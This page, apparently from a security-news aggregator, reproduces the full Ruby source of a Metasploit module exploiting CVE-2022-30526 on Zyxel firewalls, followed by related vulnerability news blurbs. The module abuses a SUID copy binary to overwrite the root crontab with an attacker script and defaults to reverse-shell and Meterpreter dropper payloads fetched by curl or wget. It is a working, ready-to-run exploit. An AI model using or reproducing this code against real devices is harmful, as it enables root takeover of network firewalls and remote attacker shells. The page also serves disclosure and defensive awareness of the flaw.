Security
Headlines
HeadlinesLatestCVEs

Headline

Zyxel Firewall SUID Binary Privilege Escalation

This Metasploit module exploits CVE-2022-30526, a local privilege escalation vulnerability that allows a low privileged user (e.g. nobody) escalate to root. The issue stems from a suid binary that allows all users to copy files as root. This module overwrites the firewall’s crontab to execute an attacker provided script, resulting in code execution as root. In order to use this module, the attacker must first establish shell access. For example, by exploiting CVE-2022-30525. Known affected Zyxel models include USG FLEX (50, 50W, 100W, 200, 500, 700), ATP (100, 200, 500, 700, 800), VPN (50, 100, 300, 1000), USG20-VPN and USG20W-VPN.

Packet Storm
#vulnerability#linux#git#auth
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Post::File  include Msf::Exploit::CmdStager  include Msf::Exploit::FileDropper  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Zyxel Firewall SUID Binary Privilege Escalation',        'Description' => %q{          This module exploits CVE-2022-30526, a local privilege escalation vulnerability that          allows a low privileged user (e.g. nobody) escalate to root. The issue stems from          a suid binary that allows all users to copy files as root. This module overwrites          the firewall's crontab to execute an attacker provided script, resulting in code          execution as root.          In order to use this module, the attacker must first establish shell access. For          example, by exploiting CVE-2022-30525.          Known affected Zyxel models are: USG FLEX (50, 50W, 100W, 200, 500, 700),          ATP (100, 200, 500, 700, 800), VPN (50, 100, 300, 1000), USG20-VPN and USG20W-VPN.        },        'References' => [          ['CVE', '2022-30526'],          ['URL', 'https://www.zyxel.com/support/Zyxel-security-advisory-authenticated-directory-traversal-vulnerabilities-of-firewalls.shtml']        ],        'Author' => [          'jbaines-r7' # discovery and metasploit module        ],        'DisclosureDate' => '2022-06-14',        'License' => MSF_LICENSE,        'Platform' => ['linux', 'unix'],        'Arch' => [ARCH_CMD, ARCH_MIPS64],        'SessionTypes' => ['shell', 'meterpreter'],        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_MIPS64],              'Type' => :linux_dropper,              'CmdStagerFlavor' => [ 'curl', 'wget' ],              'DefaultOptions' => {                'PAYLOAD' => 'linux/mips64/meterpreter_reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'MeterpreterTryToFork' => true,          'WfsDelay' => 70        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK]        }      )    )  end  # The check first establishes the system is a Zyxel firewall by parsing the  # /zyinit/fwversion file. Then it attempts to prove that zysudo.suid can be  # used by the user to write to otherwise unwrittable location.  def check    fwversion_data = read_file('/zyinit/fwversion')    if fwversion_data.nil? || fwversion_data.empty?      return CheckCode::Safe('Could not read /zyinit/fwversion. The target is not a Zyxel firewall.')    end    model_id = fwversion_data[/MODEL_ID=(?<model_id>[^\n]+)/, :model_id]    return CheckCode::Unknown('Failed to identify the firewall model.') if model_id.nil? || model_id.empty?    firmware_ver = fwversion_data[/FIRMWARE_VER=(?<firmware_ver>[^\n]+)/, :firmware_ver]    return CheckCode::Unknown('Failed to identify the firmware version.') if firmware_ver.nil? || firmware_ver.empty?    test_file = "/var/zyxel/#{rand_text_alphanumeric(12..16)}"    unless cmd_exec("/bin/cp /etc/passwd #{test_file}") == "/bin/cp: cannot create regular file '#{test_file}': Permission denied"      return CheckCode::Unknown("Failed to generate a permission issue. System version: #{model_id}, #{firmware_ver}")    end    suid_copy_result = cmd_exec("zysudo.suid /bin/cp /etc/passwd #{test_file}")    unless suid_copy_result.empty?      return CheckCode::Safe("zysudo.suid copy failed. System version: #{model_id}, #{firmware_ver}")    end    # clean up the created file    cmd_exec("zysudo.suid /bin/rm #{test_file}")    return CheckCode::Vulnerable("System version: #{model_id}, #{firmware_ver}")  end  # no matter what happens, try to reset the crontab to the original state and  # delete the backup file.  def cleanup    unless @crontab_backup.nil?      print_status('Resetting crontab to the original version')      cmd_exec("zysudo.suid /bin/cp #{@crontab_backup} /var/zyxel/crontab")      rm_rf(@crontab_backup)    end  end  def execute_command(cmd, _opts = {})    # this file will contain the payload and get executed by cron    exec_filename = "/tmp/#{rand_text_alphanumeric(6..12)}"    register_file_for_cleanup(exec_filename)    cmd_exec("echo -e \"#!/bin/bash\\n\\n#{cmd}\" > #{exec_filename}")    cmd_exec("chmod +x #{exec_filename}")    # this file will be a copy of the original crontab, plus our additional malicious entry    evil_crontab = "/tmp/#{rand_text_alphanumeric(6..12)}"    register_file_for_cleanup(evil_crontab)    copy_file('/var/zyxel/crontab', evil_crontab)    cmd_exec("echo '* * * * * root #{exec_filename} &' >> #{evil_crontab}")    # this is the backup copy of the original crontab. It'll be restored on new session    @crontab_backup = "/tmp/#{rand_text_alphanumeric(6..12)}"    copy_file('/var/zyxel/crontab', @crontab_backup)    # overwrite the legitimate crontab. this is how we get exectuion.    print_status('Overwriting /var/zyxel/crontab')    cmd_exec("zysudo.suid /bin/cp #{evil_crontab} /var/zyxel/crontab")    # check if the session has been created. Give it 70 seconds to come in.    # The extra 10 seconds is to account for high latency links.    print_status('The payload may take up to 60 seconds to be executed by cron')    sleep_count = 70    until session_created? || sleep_count == 0      sleep(1)      sleep_count -= 1    end  end  def exploit    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      execute_cmdstager    end  endend

Related news

New Findings Challenge Attribution in Denmark's Energy Sector Cyberattacks

The cyber attacks targeting the energy sector in Denmark last year may not have had the involvement of the Russia-linked Sandworm hacking group, new findings from Forescout show. The intrusions, which targeted around 22 Danish energy organizations in May 2023, occurred in two distinct waves, one which exploited a security flaw in Zyxel firewall (CVE-2023-28771) and a

Zyxel patches two critical vulnerabilities

Categories: Exploits and vulnerabilities Categories: News Zyxel has released a security advisory about two critical vulnerabilities that could allow an unauthorized, remote attacker to take control of its firewall devices. (Read more...) The post Zyxel patches two critical vulnerabilities appeared first on Malwarebytes Labs.

New DDoS Malware ‘Chaos’ Hits Linux and Windows Devices

By Deeba Ahmed Most devices infected by Chaos malware are located in Europe, particularly Italy but infections were also observed in Asia Pacific, South America, and North America. This is a post from HackRead.com Read the original post: New DDoS Malware ‘Chaos’ Hits Linux and Windows Devices

Chaos Malware Resurfaces With All-New DDoS & Cryptomining Modules

The previously identified ransomware builder has veered in an entirely new direction, targeting consumers and business of all sizes by exploiting known CVEs through brute-forced and/or stolen SSH keys.

Researchers Warn of New Go-based Malware Targeting Windows and Linux Systems

A new, multi-functional Go-based malware dubbed Chaos has been rapidly growing in volume in recent months to ensnare a wide range of Windows, Linux, small office/home office (SOHO) routers, and enterprise servers into its botnet. "Chaos functionality includes the ability to enumerate the host environment, run remote shell commands, load additional modules, automatically propagate through

Critical RCE Vulnerability Affects Zyxel NAS Devices — Firmware Patch Released

Networking equipment maker Zyxel has released patches for a critical security flaw impacting its network-attached storage (NAS) devices. Tracked as CVE-2022-34747 (CVSS score: 9.8), the issue relates to a "format string vulnerability" affecting NAS326, NAS540, and NAS542 models. Zyxel credited researcher Shaposhnikov Ilya for reporting the flaw. "A format string vulnerability was found in a

Zyxel firewall vulnerabilities left business networks open to abuse

Severity of code execution bug mitigated by ‘high uptake’ of previous patch

Zyxel firewall vulnerabilities left business networks open to abuse

Severity of code execution bug mitigated by ‘high uptake’ of previous patch

CVE-2022-30526: Zyxel security advisory for local privilege escalation and authenticated directory traversal vulnerabilities of firewalls

A privilege escalation vulnerability was identified in the CLI command of Zyxel USG FLEX 100(W) firmware versions 4.50 through 5.30, USG FLEX 200 firmware versions 4.50 through 5.30, USG FLEX 500 firmware versions 4.50 through 5.30, USG FLEX 700 firmware versions 4.50 through 5.30, USG FLEX 50(W) firmware versions 4.16 through 5.30, USG20(W)-VPN firmware versions 4.16 through 5.30, ATP series firmware versions 4.32 through 5.30, VPN series firmware versions 4.30 through 5.30, USG/ZyWALL series firmware versions 4.09 through 4.72, which could allow a local attacker to execute some OS commands with root privileges in some directories on a vulnerable device.

Zyxel USG FLEX 5.21 Command Injection

Zyxel USG FLEX version 5.21 suffers from a command injection vulnerability.

Zyxel Issues Patches for 4 New Flaws Affecting AP, API Controller and Firewall Devices

Zyxel has released patches to address four security flaws affecting its firewall, AP Controller, and AP products to execute arbitrary operating system commands and steal select information. The list of security vulnerabilities is as follows - CVE-2022-0734 - A cross-site scripting (XSS) vulnerability in some firewall versions that could be exploited to access information stored in the user's

Watch Out! Hackers Begin Exploiting Recent Zyxel Firewalls RCE Vulnerability

Image source: z3r00t The U.S. Cybersecurity and Infrastructure Security Agency on Monday added two security flaws, including the recently disclosed remote code execution bug affecting Zyxel firewalls, to its Known Exploited Vulnerabilities Catalog, citing evidence of active exploitation. Tracked as CVE-2022-30525, the vulnerability is rated 9.8 for severity and relates to a command injection flaw

Critical Zyxel Firewall Bug Under Active Attack After PoC Exploit Debut

Just one day after disclosure, cyberattackers are actively going after the command-injection/code-execution vulnerability in Zyxel's gear.

Zyxel Firewall ZTP Unauthenticated Command Injection

This Metasploit module exploits CVE-2022-30525, an unauthenticated remote command injection vulnerability affecting Zyxel firewalls with zero touch provisioning (ZTP) support. By sending a malicious setWanPortSt command containing an mtu field with a crafted OS command to the /ztp/cgi-bin/handler page, an attacker can gain remote command execution as the nobody user. Affected Zyxel models are USG FLEX 50, 50W, 100W, 200, 500, 700 using firmware 5.21 and below, USG20-VPN and USG20W-VPN using firmware 5.21 and below, and ATP 100, 200, 500, 700, 800 using firmware 5.21 and below.

Zyxel Releases Patch for Critical Firewall OS Command Injection Vulnerability

Zyxel has moved to address a critical security vulnerability affecting Zyxel firewall devices that enables unauthenticated and remote attackers to gain arbitrary code execution. "A command injection vulnerability in the CGI program of some firewall versions could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device," the company said in an advisory

CVE-2022-30525: Zyxel security advisory for OS command injection vulnerability of firewalls

A OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.

CVE-2022-30525: Zyxel security advisory for OS command injection vulnerability of firewalls

A OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution